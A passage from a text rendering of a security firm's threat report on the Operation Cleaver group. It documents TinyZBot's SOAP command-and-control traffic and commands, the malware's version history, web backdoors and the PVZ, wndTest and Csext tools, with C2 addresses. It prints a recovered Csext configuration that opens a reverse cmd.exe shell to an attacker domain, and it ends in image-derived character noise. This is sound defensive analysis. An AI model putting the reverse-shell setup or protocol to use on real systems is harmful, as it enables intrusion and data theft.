 1959. As part of SOAP communications, a URI is specified. This is internal to the sub-protocol, and does
 1960. not necessarily reflect the URI of the host running the SOAP server (ASMX file). In the case of
 1961. TinyZBot, and many examples for developing SOAP applications, this URI is tempuri.org.
 1962.  
 1963. Since the first version of the SOAP-based command and control protocol was implemented, TinyZBot used
 1964. what is referred to as a “dynamic password”. The result of this is a cryptographically hashed version
 1965. of the server time (which must be obtained through a SOAP query), the TinyZBot’s GUID, and the
 1966. TinyZBot’s AppUsageID (campaign identifier).
 1967.  
 1968. For the command and control examples below, red text represents TCP data sent from the TinyZBot
 1969. infection while blue text represents TCP data sent from the command and control server. The server
 1970. time lookup query invokes the SOAP command GetServerTime.
 1971.  
 1972. POST /checkupdate.asmx HTTP/1.1
 1973. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
 1974. Content-Type: text/xml; charset=utf-8
 1975. SOAPAction: “http://tempuri(dot)org/GetServerTime”
 1976. Host: microsoftactiveservices(dot)com
 1977. Content-Length: 291
 1978. Expect: 100-continue
 1979. Connection: Keep-Alive
 1980.  
 1981. HTTP/1.1 100 Continue
 1982. <?xml version=”1.0” encoding=”utf-8”?><soap:Envelope
 1983. xmlns:soap=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:xsi=”http://www.w3.org/2001/
 1984. XMLSchema-instance”
 1985. xmlns:xsd=”http://www.w3.org/2001/XMLSchema”><soap:Body><GetServerTime xmlns=”http://tempuri.
 1986. org/” /></soap:Body></soap:Envelope>
 1987.  
 1988. HTTP/1.1 200 OK
 1989. Cache-Control: private, max-age=0
 1990. Content-Type: text/xml; charset=utf-8
 1991. Server: Microsoft-IIS/7.5
 1992. X-AspNet-Version: 2.0.50727
 1993. X-Powered-By: ASP.NET
 1994. Date: Mon, 06 Oct 2014 13:36:47 GMT
 1995. Content-Length: 392
 1996.  
 1997. [ PG-48 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1998.  
 1999.  
 2000.  
 2001. [CYLANCE                                                                                  #OPCLEAVER]
 2002.  
 2003. TinyZBot Command and Control Protocol (cont.)
 2004.  
 2005. <?xml version=”1.0” encoding=”utf-8”?><soap:Envelope
 2006. xmlns:soap=”http://schemas.xmlsoap.org/soap/envelope/”
 2007. xmlns:xsi=”http://www.w3.org/2001/ XMLSchema-instance” xmlns:xsd=”http://www.w3.org/2001
 2008. XMLSchema”><soap:Body><GetServerTimeResponse xmlns=”http://
 2009. tempuri.org/”><GetServerTimeResult>2014-10-06T13:36:47.2193601Z</GetServerTimeResult></
 2010. GetServerTimeResponse></soap:Body></soap:Envelope>
 2011.  
 2012. This is the first query done by a running TinyZBot instance, and needs to be done shortly before
 2013. most other queries, in order to update the dynamic password.
 2014.  
 2015. Commands, updates and files to drop and execute are stored as files on the SOAP server, and access
 2016. is restricted by the AppUsageID as well as the bot GUID. This allows for commands to be sent to
 2017. all bots for a campaign as well as individual control. The TinyZBot queries the server in order
 2018. to enumerate all files currently available to it.
 2019.  
 2020. POST /checkupdate.asmx HTTP/1.1
 2021. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
 2022. Content-Type: text/xml; charset=utf-8
 2023. SOAPAction: “http://tempuri(dot)org/GetFileList”
 2024. Host: microsoftactiveservices(dot)com
 2025. Content-Length: 425
 2026. Expect: 100-continue
 2027.  
 2028. HTTP/1.1 100 Continue
 2029. <?xml version=”1.0” encoding=”utf-8”?><soap:Envelope xmlns:soap=”http://schemas.xmlsoap.org/
 2030. soap/envelope/” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xmlns:xsd=”http://www.w3.org/2001/
 2031. XMLSchema”><soap:Body><GetFileList xmlns=”http://tempuri(dot)org/”><Id>00cf6217-8c7e-4598-
 2032. b155-65ebd949bba9</Id><AppType>XYZCO</AppType><IP /><Pass>abefc81</Pass><Version>BDFF;1.0.0</
 2033. Version></GetFileList></soap:Body></soap:Envelope>
 2034.  
 2035. HTTP/1.1 200 OK Cache-Control: private, max-age=0
 2036. Content-Type: text/xml; charset=utf-8
 2037. Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727
 2038. X-Powered-By: ASP.NET Date: Mon, 06 Oct 2014 13:36:47 GMT
 2039. Content-Length: 1474
 2040.  
 2041. <?xml version=”1.0” encoding=”utf-8”?><soap:Envelope xmlns:soap=”http://schemas.xmlsoap.org/
 2042. soap/envelope/”
 2043. xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance”
 2044. xmlns:xsd=”http://www.w3.org/2001/XMLSchema”><soap:Body><GetFileListResponse xmlns=”http://
 2045. tempuri.org/”>
 2046.  
 2047. [ PG-49 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2048.  
 2049.  
 2050.  
 2051. [CYLANCE                                                                                  #OPCLEAVER]
 2052.  
 2053. TinyZBot Command and Control Protocol (cont.)
 2054.  
 2055. <GetFileListResult><string>[ALL] b93c-49a1-140914084450 [0000000000000000000000000000
 2056. 0000].tmu</string><string>[ALL]  b93c-49a1-140914084612  [0000000000000000000000000000
 2057. 0000].tmu</string><string>[ALL]  b93c-49a1-140914084619  [00000000000000000000000000000
 2058. 000].tmu</string><string>[ALL]  b93c-49a1-140914084628  [00000000000000000000000000000
 2059. 000].tmu</string><string>[ALL]  b93c-49a1-140914084638  [00000000000000000000000000000
 2060. 000].tmu</string><string>[ALL]  b93c-49a1-140914084644  [00000000000000000000000000000
 2061. 000].tmu</string><string>[ALL]  b93c-49a1-140914084659  [000000000000000000000000000000
 2062. 00].tmu</string><string>[ALL]  b93c-49a1-140914084715  [0000000000000000000000000000000
 2063. 0].tmu</string><string>[ALL]  b93c-49a1-140914084732  [00000000000000000000000000000000
 2064. ].tmu</string><string>[ALL]  b93c-49a1-140914084741  [00000000000000000000000000000000].
 2065. tmu</string><string>[ALL]  b93c-49a1-140914090807  [00000000000000000000000000000000].tmu</
 2066. string><string>[ALL]  b93c-49a1-140915103605  [00000000000000000000000000000000].tmu</
 2067. string><string>[ALL]  b93c-49a1-140915103610  [00000000000000000000000000000000].tmu</string></
 2068. GetFileListResult></GetFileListResponse></soap:Body></soap:Envelope>
 2069.  
 2070. In order to download the file and parse for commands to execute, the TinyZBot must request the file.
 2071. The file is downloaded Base64-encoded inside of the SOAP response.
 2072.  
 2073. POST /checkupdate.asmx
 2074. HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol
 2075. 2.0.50727.1433)
 2076. Content-Type: text/xml; charset=utf-8
 2077. SOAPAction: “http://tempuri(dot)org/GetFile”
 2078. Host: microsoftactiveservices(dot)com
 2079. Content-Length: 478
 2080. Expect: 100-continue
 2081.  
 2082. HTTP/1.1 100 Continue
 2083.  
 2084. <?xml version=”1.0” encoding=”utf-8”?>
 2085. <soap:Envelope xmlns:soap=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:xsi=”http://www.
 2086. w3.org/2001/XMLSchema-instance”
 2087. xmlns:xsd=”http://www.w3.org/2001/XMLSchema”>
 2088. <soap:Body><GetFile xmlns=”http://tempuri(dot)org/”><Id>00cf6217-8c7e-4598-b155-65ebd949bba9</
 2089. Id><AppType>XYZCO</AppType><IP /><Pass>abefc81</Pass><FileName>[ALL] b93c-49a1-140914084450      
 2090. [00000000000000000000000000000000].tmu</FileName></GetFile></soap:Body></soap:Envelope>
 2091.  
 2092. HTTP/1.1 200 OK
 2093. Cache-Control: private, max-age=0
 2094. Content-Type: text/xml; charset=utf-8
 2095. Server: Microsoft-IIS/7.5
 2096. X-AspNet-Version: 2.0.50727
 2097. X-      Powered-By: ASP.NET Date: Mon, 06 Oct 2014 13:36:47 GMT
 2098. Content-Length: 652
 2099.  
 2100. <?xml version=”1.0” encoding=”utf-8”?><soap:Envelope xmlns:soap=”http://schemas.
 2101. xmlsoap.org/soap/envelope/” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance”
 2102. xmlns:xsd=”http://www.w3.org/2001/XMLSchema”>
 2103. <soap:Body><GetFileResponse xmlns=”http://tempuri(dot)org/”>
 2104. <GetFileResult>OzIwMTQwOTE0X18wODQ0NTANClJVTkNNRD1jbWQuZXhlLC9DIGlwY29uZmlnIC9hbGwgP
 2105. j4gIltJTkZPTERFUl1cZDJkYjY5NmEtMzM2Ny00Njk5LWE4MTUtZGYwOTA5OGJjNTk2LnR4dCIgMj4mMQ0KV
 2106. VBMT0FEPVtJTkZPTERFUl1cZDJkYjY5NmEtMzM2Ny00Njk5LWE4MTUtZGYwOTA5OGJjNTk2LnR4dA0KREVMR
 2107. VRFPVtJTkZPTERFUl1cZDJkYjY5NmEtMzM2Ny00Njk5LWE4MTUtZGYwOTA5OGJjNTk2LnR4dA==
 2108. </GetFileResult></GetFileResponse></soap:Body></soap:Envelope>
 2109.  
 2110. [ PG-50 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2111.  
 2112.  
 2113.  
 2114. [CYLANCE                                                                                  #OPCLEAVER]
 2115.  
 2116. TinyZBot Command and Control Protocol (cont.)
 2117.  
 2118. The command file downloaded in this example is as follows:
 2119.  
 2120. ;20140914 084450
 2121. RUNCMD=cmd.exe,/C ipconfig /all >> “[INFOLDER]\d2db696a-3367-4699-a815-df09098bc596.txt”2>&1
 2122. UPLOAD=[INFOLDER]\d2db696a-3367-4699-a815-df09098bc596.txt
 2123. DELETE=[INFOLDER]\d2db696a-3367-4699-a815-df09098bc596.txt
 2124.  
 2125. The first line is a timestamp of the command. The TinyZBot command parser ignores it. The RUNCMD
 2126. line requests that cmd.exe be executed, with the command ipconfig /all being redirected to a file
 2127. in a directory designated for files to be uploaded. The UPLOAD command requests that this file
 2128. is then uploaded over SOAP to the command and control server. The DELETE command then requests
 2129. that the file be deleted from the infected system.
 2130.  
 2131. The following is a list of supported commands that TinyZBot responds to:
 2132.  
 2133. COPY REPLACE DELETE UPLOAD FUPLOAD CLEARFILES
 2134. CLEAROUPUTFOLDER SAVECONFIG SAVETOCFGFILE RESTART
 2135. RestartForce KILL DEEPKILL EXIT EXITFORCE
 2136. RUNAVDETECTOR RUNWAIT RUNCMD UCMD GETINFO
 2137. GETSCREENSHOTHQ GETSCREENSHOT CREATEUPLOADLIST FORCERESTART
 2138. FORCEEXIT UNLOADMODULE RELOADMODULE LOADMODULE UNLOADM
 2139. RELOADM REMOVEM UNLOADALL RELOADALL ADDSEC
 2140. REMSEC ADDKV CHGKV REMKV ADDK REMOVEK
 2141.  
 2142.  
 2143. Commands such as GETINFO are often run on newly infected systems, as they decide whether the infection
 2144. has hit the correct target. There are additional SOAP commands, but they will not be covered in
 2145. detail. The following is a list of all the SOAP commands: CheckFileMD5, GetFile, GetFileList,
 2146. GetServerTime, UploadFile.
 2147.  
 2148. Deception
 2149.  
 2150. TinyZBot is commonly installed using some form of deception. Recent versions use the resume-based
 2151. methods reported in the Initial Compromise sections. An additional method was used for earlier
 2152. versions. When early versions of TinyZBot were executed, they opened an image stored in the resource
 2153. section of the executable and copied the malicious TinyZBot executable to the
 2154. %AppData% directory.
 2155.  
 2156. Many of the images identified were of the popular Lebanese singer and actress Haifa Wehbe. The
 2157. backdoor additionally replaced the original malicious executable with an appropriately named image
 2158. file and padded the image file with null bytes in order to mirror the original file size.
 2159.  
 2160. [ PG-51 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2161.  
 2162.  
 2163.  
 2164. [CYLANCE                                                                                  #OPCLEAVER]
 2165.  
 2166. History
 2167.  
 2168. The earliest known version on TinyZBot was compiled on January 27, 2013. This early version had very
 2169. little functionality. It was limited to logging keystroke data, sending emails, and creating a link
 2170. in the user’s startup folder for persistence. Its method of exfiltrating the logged keystrokes relied
 2171. upon a hardcoded email address stored in the binary. The sender email address was
 2172. dyanachear(at)beyondsys.com and emails were destined for testmail_00001(at) yahoo.com. The message
 2173. was intended to look like common Viagra spam from China, but would be sent with the keystroke
 2174. logging data as attachments, as well as system information. The initial version did not provide any
 2175. means of receiving commands and was obfuscated with SmartAssembly. The following iteration compiled
 2176. on March 12, 2013, only contained minor bug fixes.
 2177.  
 2178. The next version was compiled on April 24, 2013. This version starts to look more like an average bot.
 2179. A command and control protocol was established, using HTTP and SOAP for the protocol. The command and
 2180. control server for this version was located at 173.192.144.68/ DefaultWS(dot)asmx. This new command and
 2181. control protocol allowed for the addition of quite a few other features. An update mechanism was added,
 2182. and could be regularly scheduled, so unassisted periodic update checks were automatically performed. The
 2183. SOAP API used a dynamic password mechanism, which required the computation of a simple key in order to
 2184. access certain parts of the API. The email data exfiltration method also underwent modification to be
 2185. activated at a scheduled interval. There were also some changes, which looked to be bug fixes, such as
 2186. limiting the number of times sending an email could fail.
 2187.  
 2188. The next day, April 25, 2013, a new version was compiled which allowed for self-deletion.
 2189.  
 2190. On May 14, 2013, we noticed a change which assisted in the identification of active targets. The AppUsageId
 2191. (at this point named AppType) was an identifier used by this organization in order to differentiate
 2192. between targets infected with TinyZBot, meaning they could effectively run multiple campaigns using
 2193. the same command and control server and know which target was infected. This also allowed for separate
 2194. commands to be supplied to different targets without the need for per-bot commands. At this time, the
 2195. AppUsageId was total0, but later we observed names, which aligned with active targets. The exfiltration
 2196. email address was also changed to TerafficAnalyzer(at)yahoo.com.
 2197.  
 2198. On June 17, 2013, there was an addition that allowed for the loading of configuration data from the
 2199. PE’s resources. At this time, it was limited to the exfiltration email address. This version was not
 2200. obfuscated with SmartAssembly
 2201.  
 2202. [ PG-52 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2203.  
 2204.  
 2205.  
 2206. [CYLANCE                                                                                  #OPCLEAVER]
 2207.  
 2208. History (cont.)
 2209.  
 2210. We do not see a new version of TinyZBot until June 7, 2014. There are quite a few notable improvements,
 2211. but nowhere near enough to indicate consistent development on the project for  a year. SmartAssembly
 2212. was reused again. A method was added to detect what security related software is installed. Avira
 2213. antivirus was specifically targeted and disabled, due to its detection of the new keystroke logger
 2214. module added in this version. This keystroke logger source is publicly available and referred to as
 2215. DeadkeyLogger.
 2216.  
 2217. A new string encryption class is added, but the code was copied and pasted from a Microsoft example.
 2218. The ability to extract Internet Explorer passwords was added. Clipboard monitoring code was added,
 2219. but not invoked. The emailing features were removed, but the classes which previously contained them
 2220. were still present but empty. Many more options were enabled to be loaded from PE resources. The
 2221. ability to add PE resources was added. Another version was compiled on June 7, 2014, with no feature
 2222. difference.
 2223.  
 2224. On June 17, 2014, we see the first instance of Binder_1, which is aptly named, as it is a binder.
 2225. The legitimate application used in this version of Binder_1 was compiled on August 22, 2013, and is
 2226. a self-extracting archive of desktop wallpapers, including an image from the game Mirror’s Edge. The
 2227. TinyZBot included was the version compiled on June 7, 2014.
 2228.  
 2229. The version compiled on June 23, 2014, added functionality which allowed screenshots of the desktop
 2230. to be taken.
 2231.  
 2232. On August 2, 2014, we see another version without SmartAssembly obfuscation. A bug fix is made to the
 2233. keystroke logging method, and clipboard monitoring is enabled.
 2234.  
 2235. Three items were compiled on August 18, 2014. Two of them are TinyZBot binaries, which contain a minor
 2236. key logging bug fix. The third is a new Binder_1 instance, which contains one of the TinyZBot instances
 2237. compiled that day. The legitimate application included in this binder is called Easy_resume_creator and
 2238. is a legitimate application named EasyRésuméCreatorPro. This version targeted a major Saudi Arabian oil
 2239. company.
 2240.  
 2241. From August 23 to August 26, 2014, new versions of TinyZBot were compiled with the AppUsageIds targeting
 2242. major oil and gas companies in Qatar and Kuwait, Ministries of Foreign Affairs in the Persian Gulf,
 2243. and a major airline holding company in UAE. These versions of TinyZBot moved towards a more modular
 2244. architecture where each component was in its own .NET assembly. This was presumably done to limit
 2245. antivirus detection of each individual file as well as allow for dynamic updating of specific modules.
 2246. All of these were included in their own Binder_1 instance, which also dropped Easy_resume_creator.
 2247.  
 2248. [ PG-53 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2249.  
 2250.  
 2251.  
 2252. [CYLANCE                                                                                  #OPCLEAVER]
 2253.  
 2254. History (cont.)
 2255.  
 2256. There also seem to be improved software engineering practices in many locations. FTP upload support
 2257. was added, with hardcoded credentials of ano:1. This FTP upload functionality points to the command
 2258. and control server, and is invoked by a command in the SOAP command and control channel. These
 2259. versions have the capability to install as a service.
 2260.  
 2261. On August 25, 2014, the version compiled on August 18 was submitted to VirusTotal in a ZIP archive
 2262. located at http://dl.doosan-job(dot)com/cv/Easy_Resume_Creator- v2.0.zip. This indicates that TinyZBot
 2263. is not only being installed while impersonating a résumé creation suite, but is also impersonating
 2264. potential employers when distributed.
 2265.  
 2266. On September 9, 2014, a ZIP file containing TinyZBot and a configuration targeting a major US
 2267. university with its AppUsageId was created. This was discovered on an anonymous FTP server in the
 2268. same IP range as dl.doosan-job(dot)com along with other malware.
 2269.  
 2270. From September 11 through September 17, 2014, some TinyZBot components were compiled, along with a
 2271. new dropper. This dropper impersonated a tool to submit a résumé to Teledyne. When executed, the
 2272. user is prompted to enter personal information, and at the end is given a button to submit the
 2273. résumé to Teledyne, although nothing is actually submitted. While the user enters this information,
 2274. their machine is infected with TinyZBot. The AppUsageIds for these versions target a major US-based
 2275. university as well as an Israeli aerospace company. These versions began to include a new method of
 2276. installing as a service. The service runs with the name Network Connectivity Manager.
 2277.  
 2278.  
 2279. Interesting Notes
 2280.  
 2281. TinyZBot, as well as some other tools (Csext, Net Crawler) initially would not run without a command
 2282. line parameter set. This was likely to avoid detonation-based detection engines. This command line
 2283. parameter was opensesemi which is often stored in the application’s code in an obfuscated manner.
 2284. The binders and droppers for TinyZBot provided this command line argument and others when executing.
 2285.  
 2286. TinyZBot uses a dynamic mutex. This was accomplished by combining a static preset prefix with the
 2287. active process ID. This allowed supplemental tools to keep TinyZBot running by enumerating every
 2288. process and checking if the process ID and mutex prefix existed. If no mutex and process pair was
 2289. located, another TinyZBot instance would be started.
 2290.  
 2291. [ PG-54 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2292.  
 2293.  
 2294.  
 2295. [CYLANCE                                                                                  #OPCLEAVER]
 2296.  
 2297. Command and Control Servers
 2298.  
 2299. *       88.150.214.168, United Kingdom, microsoftactiveservices(dot)com
 2300. *       95.211.241.249, Amsterdam, Noord-Holland, Netherlands
 2301. *       88.150.214.166, United Kingdom
 2302. *       173.192.144.68, Seattle, Washington, USA
 2303. *       188.227.180.213, United Kingdom
 2304. *       192.111.145.197, Rochester, New York, USA
 2305.  
 2306.  
 2307. Backdoors
 2308.  
 2309. Multiple backdoors were used by this organization. These are scripts or applications that allowed
 2310. for command or code execution outside of the victim network. Many of their backdoors were web
 2311. applications, added to web servers, so commands can be executed from a browser or client able to
 2312. communicate with them. This group includes the results of the Shell Creator mentioned in the
 2313. Attribution section, as well as ASPX backdoors used by Nesha. A PHP shell was also observed,
 2314. which also included attribution to Nesha in its hashed password.
 2315.  
 2316. An ASPX backdoor named Zh0uSh311 was located on live servers as well as recovered from a staging
 2317. server. This backdoor does not require authentication, and its use appears to be straightforward.
 2318. Its functionality breaks down into three fairly standard components: SQL queries, executing commands,
 2319. and uploading files.
 2320.  
 2321.  
 2322. [EWWW SCREENCAP!]
 2323.  
 2324. Figure 24: The ASPX backdoor named “Zh0uSh3ll”, allowing SQL queries.
 2325.  
 2326. [ PG-55 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2327.  
 2328.  
 2329.  
 2330. [CYLANCE                                                                                  #OPCLEAVER]
 2331.  
 2332.  
 2333. [EWWW SCREENCAP!]
 2334.  
 2335. Figure 25: The ASPX backdoor named “Zh0uSh3ll”, allowing file
 2336.  
 2337. This organization utilized backdoors which masqueraded as varying versions of Notepad. They replace
 2338. the existing Notepad.exe on the infected machine, and when run they call out to a remote server
 2339. and execute any shell code returned by the remote server. There will be a detailed analysis of these
 2340. backdoors posted to Cylance’s blog in the future.
 2341.  
 2342.  
 2343. PVZ
 2344.  
 2345. PVZ is a name for a set of executables used together to create a botnet. The name PVZ was assigned
 2346. by us as this is one of the few tools this organization has not named themselves.
 2347.  
 2348. [ PG-56 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2349.  
 2350.  
 2351.  
 2352. [CYLANCE                                                                                  #OPCLEAVER]
 2353.  
 2354. PVZ (cont.)
 2355.  
 2356. The components are as follows:
 2357.  
 2358. *       PVZ-In
 2359. *       PVZ-Out
 2360. *       Syn Flooder
 2361. *       LoggerModule
 2362. *       XYNTService
 2363. *       Jasus
 2364.  
 2365. XYNTService was not developed by the Cleaver team, but instead is a publicly available project which
 2366. executes an executable as a service.
 2367.  
 2368.  
 2369. PVZ-In
 2370.  
 2371. The purpose of PVZ-In is to communicate with a command and control server. Communication is primarily
 2372. unidirectional, as little information is provided from the bot to its command and control server. The
 2373. known command and control server is located at http://kundenpflege.
 2374. menrad(dot)de/js/jquery/default.aspx and the command and control protocol only uses
 2375. HTTP. The commands as well as infected computer information are transferred in the Content-Disposition
 2376. HTTP header, making the traffic easy to pass over as benign.
 2377.  
 2378.  
 2379. When a command is received from the server, the results are stored in a central location on disk that
 2380. the PVZ tools utilize. Command functionality is limited to executing supplied commands, downloading
 2381. and executing executables as well as self-updating.
 2382.  
 2383. The debug file path for PVZ-In is:
 2384.  
 2385.  
 2386. C:\Users\parviz\documents\visual studio 2010\Projects\BotManager\
 2387. Release\BotManager.pdb
 2388.  
 2389. PVZ-In has been observed using the file name ossisvc.exe.
 2390.  
 2391.  
 2392. PVZ-Out
 2393.  
 2394. PVZ-Out is the other half of the command and control channel, primarily uploading results of commands
 2395. and keystroke logging data to a remote server. The known command and control server for PVZ-Out is
 2396. located at http://www.gesunddurchsjahr(dot)de/tor/default.aspx. Much like PVZ-In, this command and
 2397. control channel communicates with the Content-Disposition HTTP header, but for file data, POST
 2398. data is supplied.
 2399.  
 2400. [ PG-57 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2401.  
 2402.  
 2403.  
 2404. [CYLANCE                                                                                  #OPCLEAVER]
 2405.  
 2406.  
 2407. Data uploaded is often compressed, which can make it more difficult to detect the exfiltration of
 2408. sensitive information.
 2409.  
 2410. The debug file path for PVZ-Out is:
 2411.  
 2412.  
 2413. C:\Users\Parviz\documents\visual studio 2010\Projects\SendModule\ Release\SendModule.pdb
 2414.  
 2415. PVZ-Out has been observed with the file name osppsvc.exe.
 2416.  
 2417.  
 2418. SYN Flooder
 2419.  
 2420. SYN Flooder is a simple network based denial of service tool. It is a command line utility capable of
 2421. being invoked by PVZ-In. Targeting information is supplied via command line parameters.
 2422. The debug file path for SYN Flooder is:
 2423.  
 2424.  
 2425. C:\Users\parviz\Documents\Visual Studio 2010\Projects\socket-test\ Release\socket-test.pdb
 2426.  
 2427. SYN Flooder has been observed using the name ossysvc.exe.
 2428.  
 2429.  
 2430. Logger Module
 2431.  
 2432. Logger Module observes the user’s actions and records them to a file. The recorded actions include
 2433. mouse clicks, active windows, keypresses, as well as clipboard data. The resulting log is written
 2434. out to a location where PVZ-Out can exfiltrate it to its command and control server. Logger Module
 2435. has been observed using the name ospcsvc.exe.
 2436.  
 2437. The following command and control servers for Logger Module have been observed:
 2438.  
 2439.  
 2440. 212.87.154.14, Baden-Wurttemberg, Germany, kundenpflege.menrad(dot)de
 2441. 212.87.154.12, Baden-Wurttemberg, Germany, www.gesunddurchsjahr(dot)de
 2442.  
 2443. wndTest
 2444.  
 2445. WndTest is the evolution of the PVZ tool chain into a single executable. The tool chain is minimized
 2446. down to a command and control communications, keystroke logging, and clipboard monitoring. The
 2447. command and control still supports upgrading, downloading, and executing of applications, as well
 2448. as executing batch scripts. WndTest installs as a service and has been observed attempting to
 2449. impersonate Adobe Report Service. WndTest starts using PHP servers for its command and control server,
 2450. some of which are listed as defaced sites.
 2451.  
 2452. [ PG-58 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2453.  
 2454.  
 2455.  
 2456. [CYLANCE                                                                                  #OPCLEAVER]
 2457.  
 2458.  
 2459. We have seen wndTest communicate with the following servers:
 2460.  
 2461.  
 2462. *       209.208.97.44, Orlando, Florida, USA, www.lat(dot)am
 2463. *       23.238.17.181, Tulsa, Oklahoma, USA, regulatorfix(dot)com
 2464. *       209.208.97.44, Orlando, Florida, USA, www.asiess(dot)com
 2465. *       198.50.100.210, Quebec, Canada, halon(dot)com.br
 2466. *       207.182.142.68, Columbus, Ohio, USA
 2467. *       95.211.191.247, Amsterdam, Noord-Holland, Netherlands
 2468.  
 2469.  
 2470. Csext
 2471.  
 2472. Csext is a backdoor application developed in C# which runs as a service. Its primary functionality
 2473. is based on commands supplied by its configuration file. The configuration file is able to store
 2474. specific commands, which are intended to run at particular times. A recovered configuration is as
 2475. follows:
 2476.  
 2477.  
 2478. domain1=srv01.microsoftwindowsupdate(dot)net,check.html,3
 2479. %%
 2480. {0}\{zhname}$$ -h -x -i {domain1} -p 443 -e c:\windows\system32\cmd.
 2481. exe ,taskkill.exe$$/F /PID {pid},00:29,00:35
 2482. %%
 2483. ##
 2484.  
 2485. This configuration executes zhCat to connect back to srv01.microsoftwindowsupdate(dot)net
 2486. (a deceptive domain owned by this group with falsified Whois data attributing to Microsoft Investor
 2487. Relations) with XORed communication using the HTTP protocol on TCP port 443. This zhCat instance is
 2488. running cmd.exe, effectively making it a reverse connecting shell. This command  runs at 00:29 in the
 2489. morning, and is killed by taskkill at 00:35. This gives the attackers a predictable method to regain
 2490. access to a compromised network if they ever lose access.
 2491.  
 2492. Csext also has email functionality similar to TinyZBot. This email functionality is used to
 2493. exfiltrate the results of commands from the command file which can also include requests like
 2494. gathering user information.
 2495.  
 2496. We have seen Csext configured to communicate with the following servers:
 2497.  
 2498.  
 2499. *       78.47.102.90, Germany, srv01.microsoftwindowsupdate(dot)net
 2500. *       174.36.195.158, Washington D.C, USA, srv01.microsoftupdateserver(dot)net
 2501.  
 2502.  
 2503. [ PG-59 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2504.  
 2505.  
 2506.  
 2507. [CYLANCE                                                                                  #OPCLEAVER]
 2508.  
 2509. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
 2510. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
 2511. %#%%%%%%%%@@@%%%@@#%%%%%%%%             MITIGATION           @@%%%%%(((@@@@%##@#@@%&@%&@@@@%@@%%@@@
 2512. #%%%%%%@@@@@@@(/%%%%%%%%%(((%%%%@@@@#####@@&&%/,,@&*/@&@@@###@##%#@@@@@@@@@%%@@%%@@@@@@@##@@@@@@@@&
 2513. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
 2514. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%
 2515. @@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
 2516. @#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
 2517. %%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
 2518. %%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
 2519. (%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
 2520. (((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(                              ,%%%%@
 2521. #(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*                                  .%%##
 2522. %%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.                                      *###
 2523. #(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&                                           (##
 2524. (#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                                        ,//*  /##
 2525. (####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                                             ///
 2526. ((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                                        ((((((
 2527. ##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                               ,#%%@%%&//%%%%
 2528. ######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
 2529. %%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
 2530. %%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
